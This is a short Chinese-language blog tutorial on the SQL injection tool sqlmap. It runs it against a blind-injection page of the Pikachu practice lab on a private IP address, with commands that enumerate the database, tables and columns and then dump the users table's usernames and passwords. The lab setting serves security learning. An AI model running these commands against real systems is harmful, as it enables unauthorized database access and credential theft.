SQLmap
是一款自动化的SQL
注入工具,可以用于检测和利用SQL注入漏洞,通过Sqlmap工具可以比较轻松的获取数据库中的相关数据,以下通过一个简单的测试案例简单介绍sqlmap的使用教程:
1.通过pikachu的sql盲注提交一个url请求,请求连接为:
http://192.168.10.69/pikachu/vul/sqli/sqli_blind_b.php?name=111&submit=%E6%9F%A5%E8%AF%A2
2.打开sqlmap软件,如果是windows端,在命令行打开sqlmap所在目录,切换盘符,cd打开路径,通过以下语句对刚才的URL进行渗透(此时要注意,sqlmap支持的python版本为python2.6或者2.7,在使用sqlmap时需要切换python的版本),此时sqlmap开始进行测试
python sqlmap.py -u "http://192.168.10.69/pikachu/vul/sqli/sqli_blind_b.php ?name=111&submit=%E6%9F%A5%E8%AF%A2"
3.sqlmap的测试结果如下图所示:
4.通过以下语句查看数据库的名称为pikachu
python sqlmap.py -u "http://192.168.10.69/pikachu/vul/sqli/sqli_blind_b.php?name=111&submit=%E6%9F%A5%E8%AF%A2" --current-db
5.在获取数据库名称后,通过数据库名称获取数据库的表,从下图的结果可以看到,数据库中所有表的名称在下面已经列出,由于我们需要知道数据库中的用户名和密码,此时需要根据表名,对列进行查询
python sqlmap.py -u "http://192.168.10.69/pikachu/vul/sqli/sqli_blind_b.php?name=111&submit=%E6%9F%A5%E8%AF%A2" -D pikachu --tables
6.输入以下数据,在表名的基础上,对列名进行查询:
python sqlmap.py -u "http://192.168.10.69/pikachu/vul/sqli/sqli_blind_b.php?name=111&submit=%E6%9F%A5%E8%AF%A2" -D pikachu -T users --columns
7.通过以上查询,可以看到此列数据中有我们需要的用户名和密码,此时输入以下命令对用户名和密码进行获取,在下方输出中可以看到通过sqlmap输出的所有用户名和密码:
python sqlmap.py -u "http://192.168.10.69/pikachu/vul/sqli/sqli_blind_b.php?name=111&submit=%E6%9F%A5%E8%AF%A2" -D pikachu -T users -C username,password --dump
8.以上就是sqlmap的简单用法
标签:sqlmap,python,简介,pikachu,E6%,192.168,sqli,使用 From: https://www.cnblogs.com/moxuexiaotong/p/18298490